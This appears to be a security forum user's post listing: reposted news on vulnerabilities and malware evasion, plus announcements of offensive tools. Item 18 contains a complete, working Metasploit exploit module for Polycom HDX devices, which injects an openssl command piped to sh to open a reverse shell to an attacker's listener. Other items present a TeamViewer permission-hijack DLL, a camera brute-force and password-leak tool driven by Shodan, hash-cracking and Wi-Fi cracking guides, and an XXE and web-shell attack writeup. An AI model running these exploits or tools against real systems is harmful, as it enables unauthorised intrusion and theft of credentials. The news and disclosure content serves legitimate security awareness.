Jump to content


Active Members
  • Content count

  • Joined

  • Last visited

  • Days Won


Everything posted by OKQL

  1. Security researchers have publicly disclosed an unpatched zero-day vulnerability in the firmware of AT&T DirecTV WVB kit after trying to get the device manufacturer to patch this easy-to-exploit flaw over the past few months. The problem is with a core component of the Genie DVR system that's shipped free of cost with DirecTV and can be easily exploited by hackers to gain root access and take full control of the device, placing millions of people who've signed up to DirecTV service at risk. The vulnerability actually resides in WVBR0-25—a Linux-powered wireless video bridge manufactured by Linksys that AT&T provides to its new customers. DirecTV Wireless Video Bridge WVBR0-25 allows the main Genie DVR to communicate over the air with customers' Genie client boxes (up to 8) that are plugged into their TVs around the home. Trend Micro researcher Ricky Lawshae, who is also a DirecTV customer, decided to take a closer look at the device and found that Linksys WVBR0-25 hands out internal diagnostic information from the device's web server, without requiring any authentication. When trying to browse to the wireless bridge's web server on the device, Lawshae was expecting a login page or similar, but instead, he found "a wall of text streaming before [his] eyes." Once there, Lawshae was able to see the output of several diagnostic scripts containing everything about the DirecTV Wireless Video Bridge, including the WPS pin, connected clients, running processes, and much more. What's more worrisome was that the device was accepting his commands remotely and that too at the "root" level, meaning Lawshae could have run software, exfiltrate data, encrypt files, and do almost anything he wanted on the Linksys device. Lawshae also provided a video, demonstrating how a quick and straightforward hack let anyone get a root shell on the DirecTV wireless box in less than 30 seconds, granting them full remote unauthenticated admin control over the device. The vulnerability was reported by the ZDI Initiative to Linksys more than six months ago, but the vendor ceased communication with the researcher and had yet not fixed the problem, leaving this easy-to-exploit vulnerability unpatched and open for hackers. So, after over half a year, ZDI decided to publicize the zero-day vulnerability, and recommended users to limit their devices that can interact with Linksys WVBR0-25 "to those that actually need to reach" in order to protect themselves. Via thehackernews.com
  2. se vede ca naiba pe tema alba
  3. macOS and iOS suffer from a kernel double free vulnerability due to IOSurfaceRootUserClient not respecting MIG ownership rules. advisory-info.txt iOS/MacOS kernel double free due to IOSurfaceRootUserClient not respecting MIG ownership rules CVE-2017-13861 I have previously detailed the lifetime management paradigms in MIG in the writeups for: CVE-2016-7612 [<a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=926" title="" class="" rel="nofollow">https://bugs.chromium.org/p/project-zero/issues/detail?id=926</a>] and CVE-2016-7633 [<a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=954" title="" class="" rel="nofollow">https://bugs.chromium.org/p/project-zero/issues/detail?id=954</a>] If a MIG method returns KERN_SUCCESS it means that the method took ownership of *all* the arguments passed to it. If a MIG method returns an error code, then it took ownership of *none* of the arguments passed to it. If an IOKit userclient external method takes an async wake mach port argument then the lifetime of the reference on that mach port passed to the external method will be managed by MIG semantics. If the external method returns an error then MIG will assume that the reference was not consumed by the external method and as such the MIG generated coode will drop a reference on the port. IOSurfaceRootUserClient external method 17 (s_set_surface_notify) will drop a reference on the wake_port (via IOUserClient::releaseAsyncReference64) then return an error code if the client has previously registered a port with the same callback function. The external method's error return value propagates via the return value of is_io_connect_async_method back to the MIG generated code which will drop a futher reference on the wake_port when only one was taken. This bug is reachable from the iOS app sandbox as demonstrated by this PoC. Tested on iOS 11.0.3 (11A432) on iPhone 6s (MKQL2CN/A) Tested on MacOS 10.13 (17A365) on MacBookAir5,2 This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: ianbeer Download GS20171212052309.tgz (2.1 KB) https://packetstormsecurity.com/files/145365/macOS-iOS-Kernel-IOSurfaceRootUserClient-Double-Free.html
  4. ShellcodeToAssembly Replace in shellcodetoasm.py with your shellcode. { Endian type is little endian. } shellcode = '' Installation git clone https://github.com/blacknbunny/ShellcodeToAssembly.git && cd ShellcodeToAssembly/ && pip2 install -r requirements.txt && python2 shellcodetoasm.py Modules manual installation pip install -r requirements.txt it can be pip2 install -r requirements.txt Usage python2 shellcodetoasm.py [returnbit] [architecture] [assembly-flavor] For example python2 shellcodetoasm.py 32 x86 att python2 shellcodetoasm.py 64 x86 Second one is auto intel Arhictectures ARM ARM64 MIPS ppc X86 Return Bit 32 64 Assembly Flavor ATT INTEL Demo: https://asciinema.org/a/xjWrXfftZS7BvSzVRd44LuzkP Download: ShellcodeToAssembly-master.zip or git clone https://github.com/blacknbunny/ShellcodeToAssembly.git Source: https://github.com/blacknbunny/ShellcodeToAssembly
  5. Sponsor pentru sport

    incearca la http://www.darkdog-energydrink.com/ energizante, suplimente, etc.. despre ce sume este vorba?
  6. Investitii in Cryptocurrencies

    liniștea dinaintea furtunii!
  7. O noua moneda virtuala UTN

  8. About SeKey is a SSH Agent that allow users to authenticate to UNIX/Linux SSH servers using the Secure Enclave How it Works? The Secure Enclave is a hardware-based key manager that’s isolated from the main processor to provide an extra layer of security. When you store a private key in the Secure Enclave, you never actually handle the key, making it difficult for the key to become compromised. Instead, you instruct the Secure Enclave to create the key, securely store it, and perform operations with it. You receive only the output of these operations, such as encrypted data or a cryptographic signature verification outcome. Limitations Only support MacBook Pro with the Touch Bar and Touch ID Can’t import preexisting key Stores only 256-bit elliptic curve private key Install & Usage Download: sekey-master.zip Source: https://github.com/ntrippar/sekey
  9. Pancake is a CLI/Emacs web/gopher/file browser. It utilizes pandoc and external downloaders such as curl, adding support for Gopher directories and plain text files, and invoking external applications (e.g., image and PDF viewers) depending on its configuration. User interaction capabilities are rather basic, as it is intended to be combined with software that provides better user interfaces – such as emacs, rlwrap, tmux, screen. cgit: https://git.uberspace.net/pancake/ github: https://github.com/defanor/pancake.git source distribution: pancake-0.1.7.tar.gz binaries (Linux, amd64): pancake-0.1.7-bin.tgz Debian binary package (amd64): pancake-0.1.7.deb See README for more information. 1. Other text-based web/gopher browsers Wikipedia lists a few major text-based web browsers, including Emacs-based ones. Pancake provides a combination of the things I liked about those, and the ones I have missed in those: Multi-protocol support (via curl or other pluggable downloaders). Multi-format support (via pandoc). Plain CLI. An Emacs interface without unnecessary blocking, and general support for embedding. Simplicity and small codebase, thanks to reusing the programs mentioned above. Efficient UI. Use of external programs to handle file types which it doesn't support. There are some drawbacks as well: A large executable file (70+ Mio uncompressed). Not as hackable in Elisp as pure (or mostly) Elisp browsers. Not as portable as C or Elisp ones. A relatively small set of features. Somewhat worse HTML parsing and rendering in some cases. Quite possibly more, depending on one's preferences. 2. Installation 2.1 Pancake cabal install would build and install pancake and its documentation. Alternatively, basic Debian packages and binary releases are available. 2.2 Emacs interface M-x package-install-file RET /path/to/pancake.el RET. To set it as your default emacs browser: (require 'pancake) (setq browse-url-browser-function 'pancake-browse-url) To load and show all images automatically (not just after saving them manually): (add-hook 'pancake-display-hook 'pancake-load-images) Though it might be desirable to write a wrapper to only show those on specific websites, e.g. webcomics, and perhaps specific images only. 3. Screenshots https://defanor.uberspace.net/projects/pancake/
  10. debugProxy is a HTTP/S proxy server that can be used by any device that supports using HTTP Proxy servers. Aditionally it is a web application that allows you to view, pause and modify traffic sent through the proxy. This means, for example, you can use debugProxy on your computer or tablet to view the traffic being sent from your phone or IOT device. For information on configuring devices or applications to use debugProxy have a look at our documentation pages. cURL If you have the curl program installed on your computer, you can test if the proxy works with this command: curl https://www.google.com/ --insecure --proxy fagiq:rhrnx@debugproxy.com:8080 If this command works as expected the requests and responses will be on the dashboard. SSL Traffic The proxy just works for HTTP requests, however to make HTTPS and HTTP2 requests a root certificate needs to be downloaded and installed. The debugProxy root certificates can be found on the certificates page. On most smart phones you can install the debugProxy root certificate by simply clicking on the certificate for your device. Try it now! Source: https://debugproxy.com/
  11. HP has an awful history of 'accidentally' leaving keyloggers onto its customers' laptops. At least two times this year, HP laptops were caught with pre-installed keylogger or spyware applications. I was following a tweet made by a security researcher claiming to have found a built-in keylogger in several HP laptops, and now he went public with his findings. A security researcher who goes by the name of ZwClose discovered a keylogger in several Hewlett-Packard (HP) laptops that could allow hackers to record your every keystroke and steal sensitive data, including passwords, account information, and credit card details. The Keylogger was found embedded in the SynTP.sys file, a part of Synaptics touchpad driver that ships with HP notebook computers, leaving more than 460 HP Notebook models vulnerable to hackers. Although the keylogger component is disabled by default, hackers can make use of available open source tools for bypassing User Account Control (UAC) to enable built-in keylogger "by setting a registry value." Here’s the location of the registry key: HKLM\Software\Synaptics\%ProductName% HKLM\Software\Synaptics\%ProductName%\Default The researcher reported the keylogger component to HP last month, and the company acknowledges the presence of keylogger, saying it was actually "a debug trace" which was left accidentally, but has now been removed. The company has released a Driver update for all the affected HP Notebook Models. If you own an HP laptop, you can look for updates for your model. The list of affected HP notebooks can be found at the HP Support website. This is not the very first time when a keylogger has been detected in HP laptops. In May this year, a built-in keylogger was found in an HP audio driver that was silently recording all of its users' keystrokes and storing them in a human-readable file. Get the list of affected hardware and patch here: https://support.hp.com/us-en/document/c05827409 Via thehackernews.com
  12. vand RDP

    99.9 % Up-time Gaurantee Unlimited Bandwidth 1 GBPS Port Pre-Installed Software Available .vandut
  13. A team of security researchers has discovered a new malware evasion technique that could help malware authors defeat most of the modern antivirus solutions and forensic tools. Dubbed Process Doppelgänging, the new fileless code injection technique takes advantage of a built-in Windows function and an undocumented implementation of Windows process loader. Ensilo security researchers Tal Liberman and Eugene Kogan, who discovered the Process Doppelgänging attack, presented their findings today at Black Hat 2017 Security conference held in London. Process Doppelgänging Works on All Windows Versions Apparently, Process Doppelgänging attack works on all modern versions of Microsoft Windows operating system, starting from Windows Vista to the latest version of Windows 10. Tal Liberman, the head of the research team at enSilo, told The Hacker New that this malware evasion technique is similar to Process Hollowing—a method first introduced years ago by attackers to defeat the mitigation capabilities of security products. In Process Hollowing attack, hackers replace the memory of a legitimate process with a malicious code so that the second code runs instead of the original, tricking process monitoring tools and antivirus into believing that the original process is running. Since all modern antivirus and security products have been upgraded to detect Process Hollowing attacks, use of this technique is not a great idea anymore. On the other hand, Process Doppelgänging is an entirely different approach to achieve the same, by abusing Windows NTFS Transactions and an outdated implementation of Windows process loader, which was originally designed for Windows XP, but carried throughout all later versions of Windows. Here's How the Process Doppelgänging Attack Works: Before going further on how this new code injection attack works, you need to understand what Windows NTFS Transaction is and how an attacker could leverage it to evade his malicious actions. NTFS Transaction is a feature of Windows that brings the concept of atomic transactions to the NTFS file system, allowing files and directories to be created, modified, renamed, and deleted atomically. NTFS Transaction is an isolated space that allows Windows application developers to write file-output routines that are guaranteed to either succeed completely or fail completely. According to the researcher, Process Doppelgänging is a fileless attack and works in four major steps as mentioned below: Transact—process a legitimate executable into the NTFS transaction and then overwrite it with a malicious file. Load—create a memory section from the modified (malicious) file. Rollback—rollback the transaction (deliberately failing the transaction), resulting in the removal of all the changes in the legitimate executable in a way they never existed. Animate—bring the doppelganger to life. Use the older implementation of Windows process loader to create a process with the previously created memory section (in step 2), which is actually malicious and never saved to disk, "making it invisible to most recording tools such as modern EDRs." Process Doppelgänging Evades Detection from Most Antiviruses Liberman told The Hacker News that during their research they tested their attack on security products from Windows Defender, Kaspersky Labs, ESET NOD32, Symantec, Trend Micro, Avast, McAfee, AVG, Panda, and even advance forensic tools. In order to demonstrate, the researchers used Mimikatz, a post-exploitation tool that helps extract credentials from the affected systems, with Process Doppelgänging to bypass antivirus detection. When the researchers ran Mimikatz generally on a Windows operating system, Symantec antivirus solution caught the tool immediately, as shown below: However, Mimikatz ran stealthy, without antivirus displaying any warning when executed using Process Doppelgänging, as shown in the image at top of this article. Liberman also told us that Process Doppelgänging works on even the latest version of Windows 10, except Windows 10 Redstone and Fall Creators Update, released earlier this year. But due to a different bug in Windows 10 Redstone and Fall Creators Update, using Process Doppelgänging causes BSOD (blue screen of death), which crashes users' computers. Ironically, the crash bug was patched by Microsoft in later updates, allowing Process Doppelgänging to run on the latest versions of Windows 10. I don't expect Microsoft to rush for an emergency patch that could make some software relying on older implementations unstable, but Antivirus companies can upgrade their products to detect malicious programs using Process Doppelgänging or similar attacks. This is not the very first time when enSilo researchers have discovered a malware evasion technique. Previously they discovered and demonstrated AtomBombing technique which also abused a designing weakness in Windows OS. In September, enSilo researchers also disclosed a 17-year-old programming error in Microsoft Windows kernel that prevented security software from detecting malware at runtime when loaded into system memory. Via thehackernews.com
  14. O noua moneda virtuala UTN

    a m ai fost postata spamezi de rupi normele
  15. Dagon - Advanced Hash Manipulation Named after the prince of Hell, Dagon (day-gone) is an advanced hash cracking and manipulation system, capable of bruteforcing multiple hash types, creating bruteforce dictionaries, automatic hashing algorithm verification, random salt generation from Unicode to ASCII, and much more. Note: Dagon comes complete with a Hash Guarantee: I personally guarantee that Dagon will be able to crack your hash successfully. At any point Dagon fails to do so, you will be given a choice to automatically create a Github issue with your hash. Once this issue is created, I will try my best to crack your hash for you. The Github issue is completely anonymous, and no questions will be asked. This is my way of thanking you for using Dagon. There are alternatives to using the automatic issue creator. If you do not want your hash publicly displayed, and feel Dagon has failed you, feel free to create your own issue. Or send an email with the hash information to dagonhashguarantee@gmail.com Screenshots Bruteforcing made easy with a built in wordlist creator if you do not specify one. The wordlist will create 100,000 strings to use Verify what algorithm was used to create that hash you're trying to crack. You can specify to view all possible algorithms by providing the -L flag (some algorithms are not implemented yet) Random salting, unicode random salting, or you can make your own choice on the salt. Demo video Download Preferable you can close the repository with git clone https://github.com/ekultek/dagon.git alternatively you can download the zip or tarball here Basic usage For full functionality of Dagon please reference the homepage here or the user manual python dagon.py -h This will run the help menu and provide a list of all possible flags python dagon.py -c <HASH> --bruteforce This will attempt to bruteforce a given hash python dagon.py -l <FILE-PATH> --bruteforce This will attempt to bruteforce a given file full of hashes (one per line) python dagon.py -v <HASH> This will try to verify the algorithm used to create the hash python dagon.py -V <FILE-PATH> This will attempt to verify each hash in a file, one per line Installation Dagon requires python version 2.7.x to run successfully. git clone https://github.com/ekultek/dagon.git cd Dagon pip install -r requirements.txt This should install all the dependencies that you will need to run Dagon Contributions All contributions are greatly appreciated and helpful. When you contribute you will get your name placed on the homepage underneath contributions with a link to your contribution. You will also get massive respect from me, and that's a pretty cool thing. What I'm looking for in contributions is some of the following: Hashing algorithm creations, specifically; A quicker MD2 algorithm, full Tiger algorithms, Keychain algorithms for cloud and agile More wordlists to download from, please make sure that the link is encoded Rainbow table attack implementation More regular expressions to verify different hash types Source: https://github.com/Ekultek/dagon
  16. Researchers: Eran Vaknin, Gal Elbaz, Alon Boxiner, Oded Vanunu Latest research from the Check Point Research Team has revealed several vulnerabilities, that puts each and every organization that does any type of Java/Android development at great risk of a threat actor exploiting these vulnerabilities and penetrating them. The vulnerabilities in question are the developer tools, both downloadable and cloud based, that the Android application ecosystem, the largest application community in the world, is using. This includes the tools that all Java/Android programmers use to build their companies business applications and that security analysts and reverse engineers use to do their work. As seen in WikiLeak’s ‘Vault 7’ release earlier this year, the CIA and NSA are exploiting vulnerabilities in products of companies of all sizes, all over the world. Earlier this year we saw incidents of the CIA hacking CCleaner, Notepad++ and many more, with the aim of spreading malwares into organizations and acquiring information on their users, and the companies themselves. Through our own research we have found several vulnerabilities that affect the most common Android IDEs – Google’s Android Studio and JetBrains’ IntelliJ IDEA and Eclipse, as well as the major reverse engineering tools for Android applications such as APKTool, the Cuckoo-Droid service and more. Our research below illustrates how we exploited these tools to gain access to internal files. Since this research, Check Point reported the discovery to APKTool developers and the other IDE companies back in May 2017. In turn, Google and JetBrains have verified and acknowledged the security issues and have since effectively deployed a fix. Technical Details – From XXE to RCE: Attacking The Second Layer The first stage of our research was focused on APKTool, (Android Application Package Tool). As the most popular tool for reverse engineering third party Android apps, APKTool is used for supporting custom platforms, analyzing applications and much more, including the decoding and rebuilding of resources. The two main features of the APKTool are: 1. Decompiling an APK file. 2. Building an APK file. From our research we found that APKTool is vulnerable in both of these main features. By looking at the source code of APKTool, we managed to identify an XML External Entity (XXE) vulnerability, due to the fact that the configured XML parser of APKTool does not disable external entity references when parsing an XML file within the program. The vulnerable function is called loadDocument and it is being used in both core functionalities – ‘Build’ and ‘Decompile’ – of APKTool. The vulnerability exposes the whole OS file system of APKTool users, and as a result, attackers could then potentially retrieve any file on the victim’s PC by using a malicious “AndroidManifest.xml” file that exploits an XXE vulnerability, that could then be sent to a remote attacker server. And this attack scenario is just one of many possible XXE attack techniques that could lead to harmful outcomes. Realizing the enormity of this vulnerability to the Android developer and researcher community, we extended our research to the vulnerable XML parser called “DocumentBuilderFactory”, which is being used in APKTool project. Vulnerabilities in Developer Tools This led us to find multiple vulnerable implementations of the XML parser within other projects. Moreover, we identified that the most popular IDEs that are used for building Android applications are affected – including Intellij, Eclipse, and Android Studio. By simply loading the malicious “AndroidManifest.xml” file as part of any Android project, the IDEs starts spitting out any file configured by the attacker. To demonstrate this vulnerability, we have uploaded a malicious project library to GitHub and cloned it to an Android Studio project. Example of a Malicious Github Project With The XXE Payload: Cloned to Android Studio: Result: The attack was delivered successfully, and the protected file was stolen and sent to the presented attacker’s server without the user being aware of it – See image below: Furthermore, we have found another attack scenario that can be used in the wild to attack a massive range of Android developers by injecting a malicious AAR (Android Archive Library) containing our XXE payload into repositories. It is possible, for example, to upload an infected AAR to a public repository such as the central Maven repository, though for demonstration purposes we have uploaded an infected AAR to a local repository. Cloning the infected AAR from the repository by the victim would allow the attacker to steal sensitive files such as configuration files, source code, company digital proprietary and much more from the OS file system. Uploading a Malicious AAR to Local Repository: Adding the AAR to Android Studio Project: Result: The attack was delivered successfully, and the protected file was stolen and sent to the presented attacker’s server without the user being aware of it: Further research of the APKTool then led us to find an additional vulnerability that allows us to execute OS commands on a victim’s PC. For advance use of APKTool there is a configuration file named “APKTOOL.YML”. This file contains an interesting section called “unknownFiles”, which allows users to include a non-standard file location that will be placed correctly on the rebuild process of an APK. The selected files are saved on the filesystem in the ‘Unknown’ folder. A legitimate “APKTOOL.YML” file structure looks like this: By manipulating the path of the “unknownFiles” section inside the “APKTOOL.YML” file, it is possible to inject arbitrary files anywhere on the file system (Path Traversal). This is due to the fact that the APKTool does not validate the path of which the unknown files will be extracted from the packed APK. Indeed, injecting arbitrary files anywhere in the filesystem leads to full Remote Code Execution (RCE) – meaning that any APKTool user/service that will try to decode a crafted malicious APK is vulnerable to RCE. For demonstration purposes, we have created a Web Application similar to the official online APK decoder ( https://apk.tools ). APKTool will extract the malicious file (in this case we used a PHP web shell) to the wwwroot folder of that server: After building the APK with the modified configuration file, the result is a compressed APK with our malicious file inside the malformed path. Uploading the APK to the demo site allows the attacker to execute OS commands on the web application server. This attack could thus be launched against any online/offline service that decodes APKs behind the scenes using APKTool. The way we chose to demonstrate this vulnerability of course is just one of many possible attack methods that can be used to achieve full RCE. Indeed, the Path Traversal method lets us copy any file to any location on the file system, making the attack surface wide and various. All the attacks methods demonstrated above are cross-platform and generic and, as the APKTool is designed to work on top of several operating systems, it is also possible to attack any system on which it operates without restriction or limitation. It is impossible to estimate the number of users of this well-known open source project. Yet, knowing that among them are some large services and companies (e.g. https://apk.tools, http://www.javadecompilers.com/APKTool, https://www.apkdecompilers.com/, http://undroid.av-comparatives.info, Cuckoo droid and many more), we contacted APKTool developer and IDE companies and are pleased to report that they all fixed the security issues and released updated and improved versions of their products. Source: https://research.checkpoint.com/parsedroid-targeting-android-development-research-community/
  17. A proof of concept injectable C++ dll, that uses naked inline hooking and direct memory modification to change your TeamViewer permissions. Features As the Server - Enables extra menu item options on the right side pop-up menu. Most useful so far to enable the "switch sides" feature which is normally only active after you have already authenticated control with the client, and initiated a change of control/sides. As the Client - Allows for control of mouse with disregard to servers current control settings and permissions. Demo Rundown Utilizes signature/pattern scanning to dynamically locate key parts in the code at which the assembly registers hold pointers to interesting classes. Applies inline naked hooks a.k.a code caves, to hi-jack the pointers to use for modification via direct memory access to their reversed classes. Inject and follow the steps Requirements Your favorite Manual Mapper, PE Loader, DLL Injector, inject into - "TeamViewer.exe" This version was Built on Windows 10, for TeamViewer x86 Version 13.0.5058 - (Other versions of TeamViewer have not been tested but with more robust signatures it may work, linux not supported) Disclaimer Developed for educational purposes as a proof of concept for testing. I do not condone the or support the use of this software for unethical or illicit purposes. No responsibility is held or accepted for misuse. Credit @timse93 - Research and Testing Download: TeamViewer_Permissions_Hook_V1-master.zip Source: https://github.com/gellin/TeamViewer_Permissions_Hook_V1
  18. Within Polycom command shell, a command execution flaw exists in lan traceroute, one of the dev commands, which allows for an attacker to execute arbitrary payloads with telnet or openssl. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Polycom Shell HDX Series Traceroute Command Execution', 'Description' => %q{ Within Polycom command shell, a command execution flaw exists in lan traceroute, one of the dev commands, which allows for an attacker to execute arbitrary payloads with telnet or openssl. }, 'Author' => [ 'Mumbai', # 'staaldraad', # https://twitter.com/_staaldraad/ 'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # took some of the code from polycom_hdx_auth_bypass 'h00die <mike@shorebreaksecurity.com>' # stole the code, creds to them ], 'References' => [ ['URL', 'https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/'] ], 'DisclosureDate' => 'Nov 12 2017', 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [[ 'Automatic', {} ]], 'Payload' => { 'Space' => 8000, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnet generic openssl'} }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' }, 'DefaultTarget' => 0 )) register_options( [ Opt::RHOST(), Opt::RPORT(23), OptString.new('PASSWORD', [ false, "Password to access console interface if required."]), OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]), OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ]) ]) end def check connect Rex.sleep(1) res = sock.get_once disconnect if !res && !res.empty? return Exploit::CheckCode::Unknown elsif res =~ /Welcome to ViewStation/ || res =~ /Polycom/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Unknown end def exploit unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to connect to target service") end # # Obtain banner information # sock = connect Rex.sleep(2) banner = sock.get_once vprint_status("Received #{banner.length} bytes from service") vprint_line("#{banner}") if banner =~ /password/i print_status("Authentication enabled on device, authenticating with target...") if datastore['PASSWORD'].nil? print_error("#{peer} - Please supply a password to authenticate with") return end # couldnt find where to enable auth in web interface or telnet...but according to other module it exists..here in case. sock.put("#{datastore['PASSWORD']}\n") res = sock.get_once if res =~ /Polycom/ print_good("#{peer} - Authenticated successfully with target.") elsif res =~ /failed/ print_error("#{peer} - Invalid credentials for target.") return end elsif banner =~ /Polycom/ # praise jesus print_good("#{peer} - Device has no authentication, excellent!") end do_payload(sock) end def do_payload(sock) # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']) # Start a listener start_listener(true) # Figure out the port we picked cbport = self.service.getsockname[2] cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n" sock.put(cmd) if datastore['VERBOSE'] Rex.sleep(2) resp = sock.get_once vprint_status("Received #{resp.length} bytes in response") vprint_line(resp) end # Give time for our command to be queued and executed 1.upto(5) do Rex.sleep(1) break if session_created? end end def stage_final_payload(cli) print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...") cli.put(payload.encoded + "\n") end def start_listener(ssl = false) comm = datastore['ListenerComm'] if comm == 'local' comm = ::Rex::Socket::Comm::Local else comm = nil end self.service = Rex::Socket::TcpServer.create( 'LocalPort' => datastore['CBPORT'], 'SSL' => ssl, 'SSLCert' => datastore['SSLCert'], 'Comm' => comm, 'Context' => { 'Msf' => framework, 'MsfExploit' => self } ) self.service.on_client_connect_proc = proc { |client| stage_final_payload(client) } # Start the listening service self.service.start end # Shut down any running services def cleanup super if self.service print_status("Shutting down payload stager listener...") begin self.service.deref if self.service.is_a?(Rex::Service) if self.service.is_a?(Rex::Socket) self.service.close self.service.stop end self.service = nil rescue ::Exception end end end # Accessor for our TCP payload stager attr_accessor :service end Source: https://packetstormsecurity.com/files/145225/Polycom-Shell-HDX-Series-Traceroute-Command-Execution.html
  19. A new craze for virtual kittens is slowing down trade in one of the largest crypto-currencies. CryptoKitties lets players buy and breed "crypto-pets" on Ethereum's underlying blockchain network. The game's developers told the Bloomberg news agency that CryptoKitties was a "key step" to making blockchains more accessible. But its popularity has underscored one of the technology's biggest downsides: its lack of scalability. Etherscan has reported a sixfold increase in pending transactions on Ethereum since the game's release, by the Axiom Zen innovation studio, on 28 November. "CryptoKitties has become so popular that it's taking up a significant amount of available space for transactions on the Ethereum platform," said Garrick Hileman, from the Cambridge Centre for Alternative Finance. "Some people are concerned that a frivolous game is now going to be crowding out more serious, significant-seeming business uses." An estimated $4.5m (£3.35m) has been spent on the cartoon cats at the time of writing, according to Crypto Kitty Sales. CryptoKitties is the first game built on Ethereum What is a CryptoKitty? Think of these rather unpalatable cartoon kittens as unique digital Pokemon cards. The game's developers describe them as "breedable Beanie Babies", each with its own unique 256-bit genome. These crypto-collectibles are also gender-fluid, able to play the role of either the "dame" or the "sire" when bred together. The kitties' unique DNA can lead to four billion possible genetic variations. Some of the varieties created so far look lifelike, with grey striped fur and bulging green eyes. Others are speckled with neon-blue spots or magenta-patterned swirls. One of the less attractive CryptoKitties How much are CryptoKitties worth? At the time of writing, the median, or mid-range, price of a CryptoKitty is approximately $23.06 (£17.19), according to Crypto Kitty Sales. The game's top cat brought in $117,712.12 (£87,686.11) when it sold on Saturday, 2 December. How can I pay for my own litter? CryptoKitties can be bought using only Ether, a crypto-currency that acts as the fuel of the Ethereum blockchain network. To get started, users must install a Chrome extension called MetaMask, which acts as a digital wallet and lets players send and receive Ether from their computers. Ether must be purchased from a crypto-currency exchange before it can be added to MetaMask. The sale page for a CryptoKitty Where do the CryptoKitties come from? Axiom Zen releases a new CryptoKitty every 15 minutes, but the rest of the supply is powered by the breeding of existing crypto-pets. Owners of kittens can put them up for sale and set their own price in ethers. Why does it matter if CryptoKitties is slowing down Ethereum? According to ETH Gas Station, the CryptoKitties game accounts for over 10% of network traffic on Ethereum. As traffic increases, transactions become more expensive to execute quickly. "The real big issue is other major players looking for alternatives to Ethereum and moving to different systems," Mr Hileman said. "There's definitely an urgency for Ethereum to try and address this issue." Via bbc.com
  20. A weak password is one that is short, common, or easy to guess. Equally bad are secure but reused passwords that have been lost by negligent third-party companies like Equifax and Yahoo. Today, we will use Airgeddon, a wireless auditing framework, to show how anyone can crack bad passwords for WPA and WPA2 wireless networks in minutes or seconds with only a computer and network adapter. To follow this guide, you'll need a wireless network adapter capable of monitor mode and packet injection. You will also need a computer capable of running VirtualBox, an open-source hypervisor, software that can create and run multiple virtual machines. This should be easy since VirtualBox has downloads for Windows, macOS, and Linux. You can also download a copy of Parrot Security OS (aka ParrotSec) to run in VirtualBox if you'd like everything to work like in our video guide below. If you want to download the ParrotSec ISO but you'd also like to stay off any NSA lists, you can always use a proxy server to download the image file while hiding your IP address. If you're already set up on Arch or Kali Linux, you can also install Airgeddon and any dependencies following the directions on GitHub, and then follow along. One thing to note: Airgeddon needs to open other windows to work, so this won't work via SSH (Secure Shell), only VNC (Virtual Networking Computer) or with a screen. As you can see in the video above, a WPA handshake can be grabbed in seconds, leaving the strength of your password as your last line of defense. If this can't stand up to a reasonable assault, your data is as good as gone if an attacker decides to knock on the door of your network. If you're looking for some help, there are plenty of ways to prevent yourself from being easy to attack with this method. Never reuse passwords, and always make sure to use secure passwords hackers won't like. Password managers like LastPass also allow you to create and sync secure passwords that are much harder to brute-force. Lastly, never share your Wi-Fi password when you don't need to, and change it regularly if you have to share your password at all. Thanks for watching, please subscribe to Null Byte on YouTube for more content, and happy cracking! Follow Null Byte on Twitter, Google+, and YouTube Follow WonderHowTo on Facebook, Twitter, Pinterest, and Google+ Source: https://null-byte.wonderhowto.com/how-to/video-crack-weak-wi-fi-passwords-seconds-with-airgeddon-parrot-os-0181434/
  21. Shodanwave Shodanwave is a tool for exploring and obtaining information from cameras specifically Netwave IP Camera. The tool uses a search engine called shodan that makes it easy to search for cameras online. What does the tool to? Look, a list! Search Brute force SSID and WPAPSK Password Disclosure E-mail, FTP, DNS, MSN Password Disclosure Exploit This is an example of shodan wave running, the password was not found through raw force so the tool tries to leak the camera's memory. If the tool finds the password it does not try to leak the memory. Demo https://asciinema.org/a/G7gVOiReMiv43V8wlMbB4mm9B?autoplay=1 How to use? To use shodanwave you need an api key which you can get for free at https://www.shodan.io/, then you need to follow the next steps. Installation $ cd /opt/ $ git clone https://github.com/fbctf/shodanwave.git $ cd shodanwave $ pip install -r requirements.txt Usage Usage: python shodanwave.py -u usernames.txt -w passwords.txt -k Shodan API key --t OUTPUT python shodanwave.py --help __ __ _____/ /_ ____ ____/ /___ _____ _ ______ __ _____ / ___/ __ \/ __ \/ __ / __ `/ __ \ | /| / / __ `/ | / / _ \ (__ ) / / / /_/ / /_/ / /_/ / / / / |/ |/ / /_/ /| |/ / __/ /____/_/ /_/\____/\__,_/\__,_/_/ /_/|__/|__/\__,_/ |___/\___/ This tool is successfully connected to shodan service Information the use of this tool is illegal, not bad. usage: shodanwave.py [-h] [-s SEARCH] [-u USERNAME] [-w PASSWORD] [-k ADDRESS] optional arguments: -h, --help show this help message and exit -s SEARCH, --search SEARCH Default Netwave IP Camera -u USERNAME, --username USERNAME Select your usernames wordlist -w PASSWORD, --wordlist PASSWORD Select your passwords wordlist -k ADDRESS, --shodan ADDRESS Shodan API key -l LIMIT, --limit LIMIT Limit the number of registers responsed by Shodan -o OFFSET, --offset OFFSET Shodan skips this number of registers from response -t OUTPUT, 